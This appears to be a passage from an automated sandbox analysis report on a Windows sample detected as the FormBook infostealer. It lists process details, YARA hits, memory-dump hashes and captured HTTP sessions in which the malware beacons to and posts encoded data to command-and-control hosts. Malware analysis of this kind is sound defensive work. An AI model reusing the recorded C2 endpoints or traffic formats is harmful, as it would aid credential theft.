FT=byeg3KqUjUk+SF1TM91DTdoLU7ugTUjAglWRkXTgcFgReGHseejZgommdPLi0e1XzJ/YkTSvi8g8S/fggs2su+5lN3uYSYyegwqlmBukW+6+CrtTw8Nv4Q1VzUaB8ypCj7K1QJL/S4C2lam+/mknLC8l3iYJxCuFtzvkwPPzSzl+o1xIOeF8vHrcFgKA7WUe/NMw0KRqp3yR/PhurRCECwEBsGah9uV1zW/tKdMSt5/Y9sBZisPCxbWPv669eMGHaI+bE81h9LrH82ayYf21BE6hlJ5q0B0cLlon45CAhemdkg0OCAE+pLLfP7UFF3hWPvna7pUvPGMstIeslP5upYIu2Zvwoq85vigq+XVWzkJr8JrUvt+XcGcWqGzDRHbSBKPm/z+Ch6H7na1+4t3Bpig6iVr6UBiiWL2cBtUjrE5Cd9nOR5ebWctpNj+1f4r55AgQd13or7lvG5QnUq10qm8dYG5PoLfwfMnpnYN5UlwKun3+T5SrJ7KubhCqo9GOwZbzFisVTZluriQDbJSQ2mB5jW+NE8NKFFy7z8dPg2fhq+GTGpvFF+jpVI+5JWuxIlhaXTLNj2yZ6Rh+zhrDRmqvXpFUJAXI1IwLU60HVMq+yTPW5fLiPxRWODYSW/4vtYdbVpLKa8L3k+xEOXdIiHleuNHPN28knpAvOxGtvjnCeFbo6KMz7v/CJwHV6JLX57LpVi6LtZ1Eo/RcUVsuPOGTCzie+S/HcAShyilzh8G3j3ZhoRoqC8Fpy7rOVo59bvl80SrbVfO46Mi3N1uYIhfrBYPKoKyqJQT7TyIFrRipJsgARwCPipxIkEZMAmmhUuoUJvIscWtHxWV1TVFqEmPErnTLqNnPnljn51TJ2UOo3nMZm9wheTooijgZVlw7PVg8C4cN/adxOI3z/IMQeucxKDq+Jky6rabKCSwKiNBuEihKk1V8bDGYTgp3XOD7XuwwY/PvFbG2MB6jD/sVCPQ1i2+vQsaoWaYxMn4pPZqxd4ftD [TRUNCATED]
Jan 11, 2025 05:05:45.180033922 CET	407	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:43 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49997	192.186.57.30	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:46.867834091 CET	486	OUT	GET /d7uk/?FT=Ww2A09LOqGBMTXt4MedKcPRCMpeKWxT/u0+P61SifFgERUvdQ+vHh8C9RtfMyLt44cTnxS353sxTMKGc1pO1hMJRS0vlIay91RDnqzSNCPeQGM5pjPJ3viUn+HC98mxcn5WmZtajdbPS&LZXLP=uRtDln HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:05:47.716093063 CET	407	IN	HTTP/1.1 404 Not Found Date: Sat, 11 Jan 2025 04:05:46 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49998	104.21.48.1	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:52.766237020 CET	759	OUT	POST /vq3j/ HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.vilakodsiy.sbs Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 215 Connection: close Referer: http://www.vilakodsiy.sbs/vq3j/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 4b 71 51 4b 59 42 57 42 6e 77 5a 64 49 6e 38 45 4d 61 4c 4b 4f 33 54 6e 64 61 53 33 52 54 56 56 46 78 6b 79 73 59 4e 31 34 35 66 4f 4a 72 6c 55 61 2b 67 63 2f 46 51 34 46 49 2f 42 6a 6d 36 32 6c 56 6f 73 43 4f 2b 41 51 69 31 6d 48 2b 52 57 79 39 6f 2b 4b 33 4d 49 77 42 46 6c 4f 55 46 43 7a 4d 75 37 47 4f 36 54 61 4f 67 57 70 53 44 64 67 64 6f 66 6a 4a 68 6a 6c 64 58 65 4c 7a 6a 33 53 66 75 46 6a 32 43 2b 7a 37 6d 57 47 56 6a 55 62 43 36 49 47 4b 5a 70 35 6a 4d 6b 65 75 4b 78 4d 4d 57 34 74 2b 4e 38 59 47 32 4c 66 6c 42 2b 54 66 69 62 56 6f 35 37 4d 6d 52 55 74 6f 45 55 44 56 36 41 45 45 34 77 51 47 38 6c 32 6a 61 4a 36 67 3d 3d Data Ascii: FT=KqQKYBWBnwZdIn8EMaLKO3TndaS3RTVVFxkysYN145fOJrlUa+gc/FQ4FI/Bjm62lVosCO+AQi1mH+RWy9o+K3MIwBFlOUFCzMu7GO6TaOgWpSDdgdofjJhjldXeLzj3SfuFj2C+z7mWGVjUbC6IGKZp5jMkeuKxMMW4t+N8YG2LflB+TfibVo57MmRUtoEUDV6AEE4wQG8l2jaJ6g==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49999	104.21.48.1	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:55.310228109 CET	779	OUT	POST /vq3j/ HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.vilakodsiy.sbs Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 235 Connection: close Referer: http://www.vilakodsiy.sbs/vq3j/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 4b 71 51 4b 59 42 57 42 6e 77 5a 64 4a 45 6b 45 4e 35 7a 4b 66 48 54 6d 52 36 53 33 66 44 56 5a 46 78 59 79 73 5a 5a 66 34 4d 48 4f 4b 4b 56 55 62 2f 67 63 79 6c 51 34 4e 6f 2f 4f 67 57 36 70 6c 56 6c 52 43 50 79 41 51 69 68 6d 48 2b 68 57 79 4d 6f 2f 4a 48 4d 4b 78 78 46 6e 44 30 46 43 7a 4d 75 37 47 4f 76 32 61 4f 6f 57 75 69 7a 64 78 50 41 65 71 70 68 73 69 64 58 65 63 6a 69 77 53 66 75 72 6a 7a 6a 72 7a 39 36 57 47 56 54 55 62 58 57 4c 49 4b 5a 76 33 44 4e 73 4f 73 72 45 54 2b 57 33 68 59 52 69 65 68 32 49 58 7a 41 63 4a 39 75 33 4c 35 42 41 49 6b 31 69 36 4f 5a 68 42 55 2b 59 4a 6d 4d 52 50 78 5a 50 37 78 37 4e 73 63 6d 76 35 31 77 6b 53 52 74 34 72 36 71 49 52 51 47 52 61 57 6b 3d Data Ascii: FT=KqQKYBWBnwZdJEkEN5zKfHTmR6S3fDVZFxYysZZf4MHOKKVUb/gcylQ4No/OgW6plVlRCPyAQihmH+hWyMo/JHMKxxFnD0FCzMu7GOv2aOoWuizdxPAeqphsidXecjiwSfurjzjrz96WGVTUbXWLIKZv3DNsOsrET+W3hYRieh2IXzAcJ9u3L5BAIk1i6OZhBU+YJmMRPxZP7x7Nscmv51wkSRt4r6qIRQGRaWk=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	50000	104.21.48.1	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:05:57.858961105 CET	1792	OUT	POST /vq3j/ HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-us Origin: http://www.vilakodsiy.sbs Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Content-Length: 1247 Connection: close Referer: http://www.vilakodsiy.sbs/vq3j/ User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko Data Raw: 46 54 3d 4b 71 51 4b 59 42 57 42 6e 77 5a 64 4a 45 6b 45 4e 35 7a 4b 66 48 54 6d 52 36 53 33 66 44 56 5a 46 78 59 79 73 5a 5a 66 34 4d 50 4f 4b 34 64 55 61 59 38 63 7a 6c 51 34 52 34 2b 70 67 57 37 7a 6c 57 56 56 43 50 76 37 51 67 5a 6d 47 63 70 57 35 65 41 2f 53 58 4d 4b 36 52 46 6d 4f 55 45 43 7a 4d 2b 2f 47 4f 2f 32 61 4f 6f 57 75 6b 66 64 68 74 6f 65 6f 70 68 6a 6c 64 57 4b 4c 7a 69 55 53 66 32 64 6a 7a 57 51 76 65 69 57 66 78 2f 55 58 46 4f 4c 41 4b 5a 74 30 44 4e 64 4f 73 6e 74 54 2b 62 47 68 59 4e 63 65 6d 43 49 47 6b 46 36 52 73 79 6a 57 72 52 72 4d 48 34 47 33 63 5a 55 48 6c 75 76 52 32 34 2f 44 32 64 56 32 52 33 38 6f 73 76 4c 34 55 4a 55 53 43 78 34 37 76 6e 78 56 6b 36 41 42 54 4c 4f 6e 48 4a 45 6d 4f 31 47 46 6a 2b 61 45 34 4f 53 76 38 6d 42 4f 47 6b 6b 38 53 6b 4d 51 39 77 46 50 4a 7a 4f 72 36 37 4e 72 61 74 46 77 7a 2b 46 4a 75 39 58 52 35 6b 54 7a 44 6d 31 45 34 79 6f 48 59 53 57 33 43 78 34 6f 41 32 4b 42 4e 76 70 6c 56 2b 7a 37 6e 61 56 54 76 51 6d 54 43 71 43 52 78 6c 51 32 76 39 [TRUNCATED] Data Ascii: FT=KqQKYBWBnwZdJEkEN5zKfHTmR6S3fDVZFxYysZZf4MPOK4dUaY8czlQ4R4+pgW7zlWVVCPv7QgZmGcpW5eA/SXMK6RFmOUECzM+/GO/2aOoWukfdhtoeophjldWKLziUSf2djzWQveiWfx/UXFOLAKZt0DNdOsntT+bGhYNcemCIGkF6RsyjWrRrMH4G3cZUHluvR24/D2dV2R38osvL4UJUSCx47vnxVk6ABTLOnHJEmO1GFj+aE4OSv8mBOGkk8SkMQ9wFPJzOr67NratFwz+FJu9XR5kTzDm1E4yoHYSW3Cx4oA2KBNvplV+z7naVTvQmTCqCRxlQ2v9E9fJ8Bc4h/tWTrRVUITDgluWnGEJNEu0JZ8d+GNWsBK12QA4KXH6m8LSI8rdcQ0s9Z6+axztki0MYq7Y8x7Nf778U1RdYHPJAg+wDG7tylSo8aeelNUR3GQ9YQP9KX9PAIxya9kzuEYs0RWeW5SkxmQRb4e8GaWKJyXqvgcAWc3IW7BLEWaPEUPEik+M9bQ8tU9WwLJgyJ0AAlQ7gABz5O95LShn4/HPyq9ROFuDGaXY1iG17O1T1DbALIK3BIzl9WEUjjG1twPFbxsG/+dnN9BNEsypIwpnNL3An3bNEHXRqOMWOcDvnhBRYuDF+hmsdNxk5VksK9nEYtst1Y4UDC+aiYq4ZPa+XtAGHauPqCKqVvb00iHS8Sz40hGraEssKg9VUW29JewWFqoz571LOKvx9tdFJTTMbkM1WUWbUFMgYYw5DsAt/wp9HJlob+/BNtmsyc167mpssPrMQfAE/oNzLr5WMJw/k72UnNquh+VyhyHbM2uGDouoHwPOoZJR54rht7sl92hlqYLvb9S05eO7vnQXXNERDE7uCMkl1FkGEHs3jX1GPkTW8K82PEHgDHu44U9NTnIvISQqfwlZQKkSA/yq4/GmYKRPU7RZfUlMBIO8KW6TLJBAX2J2ssDaJBgoKppmA4tT3gvfwzjeUX2oEFHoTHf+sT [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	50001	104.21.48.1	80	1088	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 05:06:00.403486013 CET	492	OUT	GET /vq3j/?LZXLP=uRtDln&FT=Ho4qb36IjnpDFVZFLo/hXHKtFL2cfD4IJxQxqb0l9IDMLo5abMph71gDJK+8i26TojJGFu/UDiJcafFRn4FMXAQb1xJcT0FNlvPlef7rROoumTH4jsJKwIxQhd+ZJS2reu6H0mGxpuOU HTTP/1.1 Host: www.vilakodsiy.sbs Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; Lumia 810) like Gecko
Jan 11, 2025 05:06:39.656224966 CET	958	IN	HTTP/1.1 522 Date: Sat, 11 Jan 2025 04:06:39 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9LPAm6icT6RdcGebqi4KMwpsMwEzEO2p3nYPMc9S0oGl0ulQWy2eejcsQCX%2FQg3YwAiEAulCkRCXTWJpuz22s0n7a6aONetAuALWlkUKbgBlpQYMrNcExhxkvqqbZWD%2FAu%2Fvc5Q%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 9002081f3cb68cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	23:03:33
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\ydJaT4b5N8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ydJaT4b5N8.exe"
Imagebase:	0x1c0000
File size:	810'496 bytes
MD5 hash:	FEE446D6526018C56DAD7B2A1D9985D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	23:03:48
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\ydJaT4b5N8.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\ydJaT4b5N8.exe"
Imagebase:	0x750000
File size:	810'496 bytes
MD5 hash:	FEE446D6526018C56DAD7B2A1D9985D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1660637052.0000000001260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1659559960.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000A.00000002.1662457290.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	01:00:32
Start date:	11/01/2025
Path:	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe"
Imagebase:	0xf70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3126887129.0000000002570000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	12
Start time:	01:00:34
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\fontview.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\fontview.exe"
Imagebase:	0x870000
File size:	113'152 bytes
MD5 hash:	8324ECE6961ADBE6120CCE9E0BC05F76
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127827624.0000000004150000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3123177691.0000000000170000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3127701911.0000000004100000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	13
Start time:	01:00:47
Start date:	11/01/2025
Path:	C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\NExWylnGkkJliRPxYIQYdJXjIOmGnCJbOnvlWOgLNtjFgzrSTqcGzgWH\mErdTxurOiTQQ.exe"
Imagebase:	0xf70000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3129343241.0000000005450000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	15
Start time:	01:00:59
Start date:	11/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	11.8%
Dynamic/Decrypted Code Coverage:	98.7%
Signature Coverage:	0%
Total number of Nodes:	228
Total number of Limit Nodes:	14

Executed Functions

Function 08F89050 Relevance: 2.9, Strings: 2, Instructions: 371
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'q, xrefs: 08F89560
@v1, xrefs: 08F89117

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: 4'q$@v1
API String ID: 0-1972933091
Opcode ID: cbab86b6413310591cc824f528988f60a8eb193ae37449eb30cf03fc74801413
Instruction ID: 0d2d5831183cd2abe11703e5e4946b70757a9002a55facd8155d913576d465e1
Opcode Fuzzy Hash: cbab86b6413310591cc824f528988f60a8eb193ae37449eb30cf03fc74801413
Instruction Fuzzy Hash: D5E14974F00208DFDB15EBB5C854BAEBFB2EB88312F148169E406A7355CB71AD42DB61

Function 00AD2298 Relevance: 2.8, Strings: 2, Instructions: 262
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8:8=, xrefs: 00AD260C
bMr?, xrefs: 00AD23CB

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: 8:8=$bMr?
API String ID: 0-851859457
Opcode ID: 22a9fa84b4dc0a7f13e16a300ce4ab1388d09fbe2c666e52d524c87dc2bf2a06
Instruction ID: cdc56d6fc460ed566182801ffb0ead0e9408c3d68e1cfc7abd1d7d0ac80ab5dc
Opcode Fuzzy Hash: 22a9fa84b4dc0a7f13e16a300ce4ab1388d09fbe2c666e52d524c87dc2bf2a06
Instruction Fuzzy Hash: 8CA10471A08205CFC705CF68C898A9ABBB1FFA5300B268597E8179F796C334ED52CB51

Function 04C79A40 Relevance: 1.6, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

$Aq, xrefs: 04C79A65

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: $Aq
API String ID: 0-3665547428
Opcode ID: 34ed9eaf159c19186282d20aafd3e53c57e82f687f51096ebf066c5bc1b2c9a6
Instruction ID: f8573d7ef4ebe41ae708e17558929c5bd6c2ce225939f8ded1a0968e7f6834c2
Opcode Fuzzy Hash: 34ed9eaf159c19186282d20aafd3e53c57e82f687f51096ebf066c5bc1b2c9a6
Instruction Fuzzy Hash: 50C19074A002058FEB14EFA9C984A6EBBB3FFC8300F148569E406AF395DB74ED458B51

Function 04C79A31 Relevance: 1.6, Strings: 1, Instructions: 308COMMON

Download Yara Rule

Strings

$Aq, xrefs: 04C79A65

Memory Dump Source

Source File: 00000000.00000002.1427987063.0000000004C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4c70000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID: $Aq
API String ID: 0-3665547428
Opcode ID: f1638ce0d5f4eead0e41820b3d7facc1f8198b0efb51e82531ed1c19fd2f1cb9
Instruction ID: fb9e3d2d4d1030c3e40165313a29bcdec47a9f30812172454169906a1d27ba2e
Opcode Fuzzy Hash: f1638ce0d5f4eead0e41820b3d7facc1f8198b0efb51e82531ed1c19fd2f1cb9
Instruction Fuzzy Hash: 4DC19F75A002058FEB14EFA9C984A6EBBB3FFC8300F148569E406AF395DB74ED458B51

Function 08F8E4D8 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4aa98fbb845ba63d90832cb3f3c6174969b26827d900a31b8bf84c3839d29e9
Instruction ID: 842f63d6045ffdea465006328bf7cbce0a46d565d1c0e914bafe6c4f254ea5b8
Opcode Fuzzy Hash: f4aa98fbb845ba63d90832cb3f3c6174969b26827d900a31b8bf84c3839d29e9
Instruction Fuzzy Hash: DF328871B01204CFDB24EB79C950BAEBBF6AF89701F24446DE1469B3A1DB35E902CB51

Function 08F81E78 Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1429642584.0000000008F80000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8f80000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e877626890e4759954f392805fc01bc0bd6efeab34d880316b3034bf1992b98
Instruction ID: 0bd754cae819be5544b4bc1a7a8c4fbf22721123cb3710b1a1596274a34731b0
Opcode Fuzzy Hash: 2e877626890e4759954f392805fc01bc0bd6efeab34d880316b3034bf1992b98
Instruction Fuzzy Hash: 62B11772E09344CFD701AB79D8457BABB71FF82312F1882ABD555DB282C734A846C762

Function 00AD19C5 Relevance: .3, Instructions: 293COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 550e55dd05fc387815427e77fb307008ce6530b50f1dceae792c93f822ac5af6
Instruction ID: bae4f489de8a0ec6300e493743ada3a0e4057f0f1bd82636fc3423ba9e855ba9
Opcode Fuzzy Hash: 550e55dd05fc387815427e77fb307008ce6530b50f1dceae792c93f822ac5af6
Instruction Fuzzy Hash: 9CC11571A096458FC706CF24C894699BFB1FFA2301B16869BE8439F797C334E956CB42

Function 00AD1A45 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd190a77ec19aa7a374bdb7e75c19c8d2a2ca6958d2fd450bb82330c98858d7a
Instruction ID: e02c039162f49071b699859528ad39cfcb8fe7275e32d8140f05b0071f01bc15
Opcode Fuzzy Hash: cd190a77ec19aa7a374bdb7e75c19c8d2a2ca6958d2fd450bb82330c98858d7a
Instruction Fuzzy Hash: FCB1F3716092858FC702CF24C894699BFB1FFA2301B16869BE8439F797C331D956CB42

Function 00AD20DD Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1423953076.0000000000AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ad0000_ydJaT4b5N8.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4f143c74657c6c21163f0a24482466f5e1409e09bdbb30b11123031179c046b
